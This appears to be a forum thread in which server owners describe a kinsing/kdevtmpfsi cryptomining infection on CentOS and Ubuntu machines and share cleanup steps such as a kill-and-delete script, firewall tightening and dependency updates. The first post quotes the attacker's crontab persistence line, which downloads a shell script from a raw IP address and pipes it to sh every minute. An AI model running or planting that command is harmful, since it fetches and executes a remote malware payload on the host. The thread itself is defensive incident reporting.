I've recently been hacked on my VPS(using Centos 7.6 and CWP up to date) and the following files/folders were created:
/tmp/.ICEd-unix
/var/tmp/.ICEd-unix
/tmp/kdevtmpfsi
/var/tmp/kinsing
The following processes were running and using 100% CPU and Memory:
kdevtmpfpsi
kinsing
Also, the user's crontab had this following line:
* * * * * wget -q -O - http://195.3.146.118/p.sh | sh > /dev/null 2>&1
As of yet, I'm still getting the /tmp/.ICEd-unix
and /var/tmp/.ICEd-unix
folders created every hour and I can't figure out what it is.
- create a cron on root user that deletes and kills the processes:
#/bin/bash
rm -f /var/tmp/kinsing
rm -f /var/tmp/.ICEd-unix
killall -9 kinsing
rm -f /tmp/kdevtmpfsi
rm -f /tmp/.ICEd-unix
killall -9 kdevtmpfsi
- remove the crontab line from the affected user
- remove all unnecessary opened ports in firewall
- disable shell access to the user(from CWP)
- update all services/projects to the latest possible versions available in your package manager
- Found these lines in
suexec.log
: https://imgur.com/yIliqjJ, therefore an exploit from phpunit. My libraries for the laravel project weren't up to date.
Hi folks, I'm also facing the same issue in
Ubuntu 18.04.5 LTS
after deleting the malware files/tmp/kinsing
&/tmp/kdevtmpfsi
its generating automatically.Fixing this issue created the bash script & set the cronjobs to run.
My solution is following steps:
Run htop and then push F9 to kill program. We have to kill kdevtmpfsi and kinsing as well.
Save this one file (some-script.sh) configure the cronjobs for this
Step 1: Open crontab (the cron editor) with the following command.
$ crontab -e
Step 2: If this is your first time accessing crontab, your system will likely ask you which editor you'd prefer to use. In this example, we'll go with nano (type 1 and then Enter) since it's the easiest to understand.
Step 3: Make a new line at the bottom of this file and insert the following code. Of course, replace our example script with the command or script you wish to execute, but keep the
*/5 * * * *
part as that is what tells cron to execute our job every 5 minutes.Step 4: Exit this file and save changes. To do that in nano, you'd need to press Ctrl + X, Y, and then Enter.
That's all there is to it. Scheduling jobs in cron will run Every 5 Mins.
Hope it helps you!